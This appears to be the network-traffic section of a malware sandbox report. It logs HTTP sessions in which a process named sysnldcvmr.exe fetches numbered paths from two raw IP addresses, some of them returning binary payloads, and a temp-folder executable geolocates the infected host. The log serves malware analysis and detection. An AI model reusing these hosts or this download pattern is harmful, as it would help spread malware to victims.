Dec 5, 2024 17:32:33.495840073 CET	1236	IN	Data Raw: 80 29 c3 1b 91 2c 56 75 94 50 da 12 a2 5c 9e 90 1d 9a 9f fe 26 ea a8 1f d1 b3 57 33 8f 35 74 48 82 da 6b 2d ea 8c c4 0a 58 7b 3b f9 a5 b2 68 c8 43 18 f6 b4 6e 69 26 15 28 df fc d4 4f 36 c5 93 ca 6f 8d 58 34 0c f5 53 01 78 2d 10 c6 2d 7c ca 9e 6b Data Ascii: ),VuP\&W35tHk-X{;hCni&(O6oX4Sx--\|kiW'TF;%.ExZ}_`S0q!0Nc9^EySD6`L0Gk{42BCWv6amV_?}"o_w#~_Pf.ym<-#jD*
Dec 5, 2024 17:32:33.495855093 CET	1236	IN	Data Raw: 6d 99 87 9a de 95 6e d2 d5 cc 32 ae ca d7 b3 f6 eb 75 01 11 13 c8 5b 53 fc b7 b1 5f c9 89 fb b6 17 06 f9 3b 07 5a b3 b7 5c 73 8b f3 52 47 83 96 d9 bc 0a b3 37 35 89 38 17 df b7 91 93 b3 36 2d 6a 3d db 8b 22 cc 2d f2 ae 67 c2 2a c9 4a bc f1 70 3c Data Ascii: mn2u[S_;Z\sRG7586-j="-gJp<&]2=.yp0SbdcHqH]T\|1pX3t/I+.?h!7v?NJAE=oaT:O(sRAu P+H~p2.X$I2
Dec 5, 2024 17:32:33.613574028 CET	1236	IN	Data Raw: 5d ac b7 e5 06 c7 5a a4 2e 38 cb 22 48 51 15 6a 65 c1 e7 5c ee 9c 66 b3 22 30 c9 74 66 08 6d 3a d5 4c 0d 9e 44 de c1 3e e9 36 e2 75 1f 84 5e bb 7c b1 1d 6c 11 5b c4 39 88 5b cb cc ca fa bf c3 97 4b 5e 6e 40 5c 80 48 77 01 26 d3 b6 54 43 98 97 77 Data Ascii: ]Z.8"HQje\f"0tfm:LD>6u^\|l[9[K^n@\Hw&TCw#b)[S~\I=G3ND]+i:yH>.!=l$pJsNZ$yy=)X-GfX`PYrFo{[ffqGCT#'!#^ltJeBu

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.11	49856	178.237.33.50	80	1852	C:\Users\user\AppData\Local\Temp\2910625892.exe

Timestamp	Bytes transferred	Direction	Data
Dec 5, 2024 17:32:39.233906984 CET	97	OUT	GET /json.gp?ip= HTTP/1.1 User-Agent: MSIE Host: www.geoplugin.net Cache-Control: no-cache
Dec 5, 2024 17:32:40.487355947 CET	1171	IN	HTTP/1.1 200 OK date: Thu, 05 Dec 2024 16:32:40 GMT server: Apache content-length: 963 content-type: application/json; charset=utf-8 cache-control: public, max-age=300 access-control-allow-origin: * Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 32 32 38 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 [TRUNCATED] Data Ascii: { "geoplugin_request":"8.46.123.228", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.11	49860	91.202.233.141	80	7744	C:\Windows\sysnldcvmr.exe

Timestamp	Bytes transferred	Direction	Data
Dec 5, 2024 17:32:40.413906097 CET	166	OUT	GET /1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: 91.202.233.141
Dec 5, 2024 17:32:41.752402067 CET	728	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Thu, 05 Dec 2024 16:32:41 GMT Content-Type: text/html Content-Length: 564 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Dec 5, 2024 17:32:43.835342884 CET	166	OUT	GET /2 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: 91.202.233.141
Dec 5, 2024 17:32:44.275445938 CET	728	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Thu, 05 Dec 2024 16:32:44 GMT Content-Type: text/html Content-Length: 564 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Dec 5, 2024 17:32:46.612999916 CET	166	OUT	GET /3 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: 91.202.233.141
Dec 5, 2024 17:32:47.058316946 CET	728	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Thu, 05 Dec 2024 16:32:46 GMT Content-Type: text/html Content-Length: 564 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Dec 5, 2024 17:32:49.083053112 CET	166	OUT	GET /4 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: 91.202.233.141
Dec 5, 2024 17:32:49.525414944 CET	728	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Thu, 05 Dec 2024 16:32:49 GMT Content-Type: text/html Content-Length: 564 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Dec 5, 2024 17:32:51.562633038 CET	166	OUT	GET /5 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: 91.202.233.141
Dec 5, 2024 17:32:52.001179934 CET	728	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Thu, 05 Dec 2024 16:32:51 GMT Content-Type: text/html Content-Length: 564 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.11	49903	185.215.113.66	80	7744	C:\Windows\sysnldcvmr.exe

Timestamp	Bytes transferred	Direction	Data
Dec 5, 2024 17:32:55.374587059 CET	166	OUT	GET /1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: 185.215.113.66
Dec 5, 2024 17:32:56.705826044 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 05 Dec 2024 16:32:56 GMT Content-Type: application/octet-stream Content-Length: 9472 Last-Modified: Tue, 03 Dec 2024 13:03:44 GMT Connection: keep-alive ETag: "674f01b0-2500" Accept-Ranges: bytes Data Raw: a8 ae a9 45 71 6e c0 b6 37 92 82 98 6e c2 a5 8e 2a 25 0f 76 20 75 26 50 55 1b ea 98 8e dc 4b 3a 96 50 b2 58 9e 09 77 fc 6a 3e b2 ab 3f 68 e1 72 12 22 42 c3 f5 05 48 2b 3c f4 a3 5f 81 f1 69 40 de 88 46 74 8c a1 91 28 1e b3 2a b1 73 49 65 e4 30 ef 87 61 6c 0a 1b 2e 93 42 4d 1a 5f 8f db c0 ee 24 22 98 b5 6f 90 1b 36 1f 11 c7 a2 b9 2a e5 36 35 cf 09 16 aa fa 26 f0 e6 ac 23 26 a8 73 51 08 65 c5 6e 1a f7 9d 52 1b ba 02 48 1d c4 af c4 1a b4 1f ed be cd d6 16 b3 78 f7 81 a8 86 53 0d f6 07 4d b4 82 f1 f9 22 de 19 0a a4 97 3c b1 e5 7a c7 ec b5 bc e7 a9 6a 83 67 a1 1c 3e 3c 43 ec 39 84 b6 31 c7 5b 0b 3a 86 a9 ce 31 57 2f 03 ad cb 38 ec c0 01 c8 17 63 04 aa f1 90 8b d2 68 f6 1d 5b ba d7 10 6d a2 88 9a e8 eb 51 b1 13 00 f5 25 8e 1b 7f 62 70 b3 e9 bd bc 01 e8 18 3d be 3d 50 9b 98 a1 c2 24 ef f2 3f eb 2f cf 9f e3 e6 9b 35 85 3a 85 6a 04 c7 20 b2 30 bd e8 12 d0 cf 39 7b 0a 29 d4 84 52 4c 64 b5 a3 75 4e 80 ef 22 ae 05 61 3c 18 53 fd ad 22 1f 26 d1 00 46 9a bf a2 81 8d 9e 6f 98 71 49 b7 7d 53 7d 98 a8 4a fd bf da 86 [TRUNCATED] Data Ascii: Eqn7n%v u&PUK:PXwj>?hr"BH+<_i@Ft(sIe0al.BM_$"o665&#&sQenRHxSM"<zjg><C91[:1W/8ch[mQ%bp==P$?/5:j 09{)RLduN"a<S"&FoqI}S}J&fRt:Dx_B)OUDdx7Da}Zk)%j_7?Wg.l`<#Z#bp1PTbkGx7[5.!RFmw52)ZTNy8A(`_^Z`"7w\=Bz-s'Dxe%sI,_8<1Bp)a0Q_I^fBoaF>O0X5(e/kaa.39[rJ&3V:9_k"ft{wTsVHcNER.tKB:c4+}U2M.! hm%C>={g_{NBaA~}_Rzyjm9Os+zQ[Z`Yi@RjaAaBmA@zY!+oUHWO$1fsK:0:*,a\n>\P(Lr@xSie;b\|HyW9>Sgx%2S\4`zG
Dec 5, 2024 17:32:56.705948114 CET	1236	IN	Data Raw: 24 13 d6 38 8f fc 29 77 22 b4 15 19 b0 a1 cb b7 e0 4b 1c 76 57 dd 1d f0 60 d9 f7 52 69 5b 23 e7 38 30 47 63 bb ed 1b f7 15 f5 97 29 91 dd ce 82 b8 e8 94 a9 05 9b 8f 35 1e 45 c7 e8 20 ef d0 db 16 80 fe b4 ac eb 35 12 74 77 72 24 37 62 b3 27 5c 81 Data Ascii: $8)w"KvW`Ri[#80Gc)5E 5twr$7b'\{Zuw\|1r $K/.v$$3xj7GI8wA>$6NFjh2m[=k08a}H E"5G[
Dec 5, 2024 17:32:56.705966949 CET	1236	IN	Data Raw: 89 11 90 f0 30 5d 06 79 7d 11 91 53 a2 46 2a 99 af 89 be 89 c8 83 47 2f 5e ef 6a 87 f1 7c 3a df a2 02 bb a3 df d2 1f 3a 08 9d e6 63 5d dd e3 c8 b4 1a ad 2a 53 c5 97 64 d5 9b b7 66 cc 4b 9e c7 1a 33 07 e8 ac 25 da a7 84 91 1d 25 bd de 9a e6 f7 1a Data Ascii: 0]y}SFG/^j\|::c]SdfK3%%4vriY^~4w/'`3Wx0b/".4AM0IjS#O'1V##+.jttssp4F9a0{W{+mF9_X#9`<`811
Dec 5, 2024 17:32:56.705979109 CET	1236	IN	Data Raw: 1d be e3 38 fe 87 7e b5 6d 58 aa 5c 13 e6 a5 b7 77 a5 c8 43 39 e2 87 3a 9a d6 88 bd c1 a8 f5 24 83 23 a6 89 0d de 27 33 d7 55 67 b0 a9 0e 84 95 1d 85 2c 1d e0 b5 27 93 cb 6e db b1 78 8b c2 05 c1 16 93 b6 0f 53 d9 20 e5 88 aa c2 25 c4 f3 16 d3 1d Data Ascii: 8~mX\wC9:$#'3Ug,'nxS %kU0]P>/DO\)#B+w~GkumhhFFjx6>`bz+Gb_k:EeWSIF+n8l-"kz.To()>H<#DIj$W:J/eU\ep
Dec 5, 2024 17:32:56.705990076 CET	1236	IN	Data Raw: 2f d2 b0 3f e0 39 9a 07 57 31 bc fd 0e 71 99 76 58 86 49 b0 90 52 15 84 2c 37 30 4e 73 a1 ca 93 3d 29 c7 b9 aa 3f 97 61 0f a3 a5 e1 dc 06 ec 8d 7f 52 6d 54 b5 79 ff eb 4b 04 ec 05 bd cd 2c 34 02 21 8b 77 e6 70 c0 d6 2f be 36 de 14 26 aa db 2a b7 Data Ascii: /?9W1qvXIR,70Ns=)?aRmTyK,4!wp/6&*_C2kYO~6~hcah\(W"hY$4C$fjz0nqh:~rfrN1Vx1qn>5T M .A'=+<
Dec 5, 2024 17:32:56.706001997 CET	1236	IN	Data Raw: f5 33 7e 51 d0 1d 0a cc 3f c9 2e 84 8f 1f 47 7d e2 6d e2 1a 0f f8 27 13 14 59 b3 46 45 33 ef f4 67 df eb e0 59 ff 29 b1 ea 12 c8 d9 b4 d1 af e6 9a fb a4 ba 80 a7 30 c6 d1 c0 f6 10 d3 09 45 64 60 be e2 7c cb 6d ea 76 2f 1b 4e e8 b1 98 dc 7f 2e b1 Data Ascii: 3~Q?.G}m'YFE3gY)0Ed`\|mv/N.bT3>r_qaE~=1u,Ok['HJyp[+"22?!s8:8Lb\|BQEdqN96>7:WtKtrXl2CDFcu~ZZqrD-#l}E&Q
Dec 5, 2024 17:32:56.706013918 CET	776	IN	Data Raw: 37 36 14 ef 30 ee f8 f2 f4 b1 32 98 51 9c 01 31 ae e5 14 0d d7 4f dc 08 c1 ff d0 f6 0c b9 ba 36 ce 8c 81 ed ae 51 2e 2d dd 11 21 52 a2 c6 ae 9a 19 04 42 88 fd f9 34 22 97 f2 66 93 e9 57 03 52 d5 56 9d b9 33 43 49 36 e9 35 df e2 f0 f5 c6 9b b5 78 Data Ascii: 7602Q1O6Q.-!RB4"fWRV3CI65x`3$Tg^:F=nlX,#~4?^./1OV&}S5x8>mw{iQr8!XUfG.p2"3PoG%X@3\|_M\|7
Dec 5, 2024 17:32:56.706021070 CET	1236	IN	Data Raw: 61 99 31 c2 26 77 3c 9e b9 8f ec d8 a9 2b 6e 6c c1 ef 6d 34 e7 d2 5c a8 68 3e 85 36 3f 6c cb 14 8b e4 50 7e 9f 27 e2 c3 82 8b 33 4f 7c 44 d7 48 48 6f dc b2 6a 43 61 04 96 2d 13 ea ab d5 3e 27 c1 bf ed 58 0b 63 08 45 dd 03 b8 67 a8 e3 50 66 00 df Data Ascii: a1&w<+nlm4\h>6?lP~'3O\|DHHojCa->'XcEgPfd~\ci].ss^*oHGby%<w/oF`l(WWNa0G%::PTBjbPK;]R`SeA!^\|:9z!8TrnGO^
Dec 5, 2024 17:32:56.706140995 CET	308	IN	Data Raw: 03 db 51 0c 57 57 fe eb 8b 30 b8 70 d8 76 da b7 a1 e0 75 66 9a 7e 51 b6 be ff 5b 55 5a d5 6b fc 99 22 01 aa ef db 3b d2 d9 a7 67 36 e3 ed 93 8b c4 e5 f1 c0 d4 f6 12 77 6a c3 89 aa 49 e9 27 15 d7 83 69 5b 2b 8d 60 30 2e 71 a8 9d 3a 49 f5 24 44 f7 Data Ascii: QWW0pvuf~Q[UZk";g6wjI'i[+`0.q:I$Dy_}~G):oR`Og";h~K^oxXTir&D\?uTGmK>*clj_)<1zk:!_yuLFTI";gR

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.11	49912	185.215.113.66	80	7744	C:\Windows\sysnldcvmr.exe

Timestamp	Bytes transferred	Direction	Data
Dec 5, 2024 17:32:58.976722956 CET	166	OUT	GET /2 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: 185.215.113.66
Dec 5, 2024 17:33:00.283077955 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 05 Dec 2024 16:33:00 GMT Content-Type: application/octet-stream Content-Length: 10496 Last-Modified: Sun, 20 Oct 2024 18:34:00 GMT Connection: keep-alive ETag: "67154d18-2900" Accept-Ranges: bytes Data Raw: 13 e3 aa 7c f1 40 76 43 29 84 09 02 71 ae 39 fc df 9d fa 02 4b d8 7b 3e ae 0c e2 64 38 f9 d3 27 da 73 10 d1 ca f9 f2 4a f8 ad aa 12 e8 fa c9 50 6e f5 a1 6b 88 56 c2 7a 1f 17 e8 40 57 00 b2 8f df 4c 7b e3 14 75 47 bf 27 47 31 bb 43 4c 8e e7 b4 40 14 db 1d 3c 42 cc e1 36 dc d3 3b 91 3e 68 4d 15 e2 5c e6 98 da 7c 77 03 42 8c 76 ca a5 9a 81 db a1 ec 75 f2 84 a2 67 09 f0 c5 b4 4f 58 86 25 fc 20 b3 68 fa 72 39 3a 7c e0 1b f5 e8 b0 73 b6 f8 3c 81 36 fa 29 81 67 e8 ee 34 47 6c 59 b9 7f 18 32 42 66 14 35 b3 8d e2 41 8d e5 92 2b 47 1f c0 93 b3 28 d8 54 2d 6f 45 f1 c3 5a cf 49 32 33 d3 7b ac a8 27 33 c1 c9 e0 29 60 f9 b3 d3 5e 65 37 6a 7a 2f 4d 24 73 1b 93 bb fa 91 d2 34 ce 9b 19 db d6 2a 31 36 f0 a2 ab 92 6d 08 d9 66 72 6e 07 c5 44 44 2c 9e af ae ce d3 fb 57 61 28 cd 32 90 44 0e c3 39 95 a9 ab 17 e4 0d 16 a5 f0 c2 e3 78 c3 de e1 fa ff 86 d7 ae ab 06 ba 5a 6b 34 44 61 15 d3 b1 85 29 3f 83 f4 5f 68 10 ed 8d d7 73 41 11 b6 57 f3 ed 02 fa a4 42 32 ff 99 d6 ea 0a 63 48 51 ba 54 b5 00 01 83 3d 9e bb 55 dd 93 1c e5 [TRUNCATED] Data Ascii: \|@vC)q9K{>d8'sJPnkVz@WL{uG'G1CL@<B6;>hM\\|wBvugOX% hr9:\|s<6)g4GlY2Bf5A+G(T-oEZI23{'3)`^e7jz/M$s4*16mfrnDD,Wa(2D9xZk4Da)?_hsAWB2cHQT=U@3}!YGCX{ 4"&h0.'xu#c\|gL0)cM]oL{:En:?\|_XPQ@ 3.o)ua[I+fZM% ]2uz_Gwt0bFaMTd2Y&TMXP}+OpQEo6R;P>8`2'"~CZ_,2g $l"x:h;H`$-6_-eC?6T=qL3&fG)WG@6X~%X%RCh?R].fbU!PHh"Rj,dk.e\~hn(,G<u16tlw;p;yrSC_M6XhtG7zsHP,e_ddcn^M+ct\0jr>;_nq>xezw
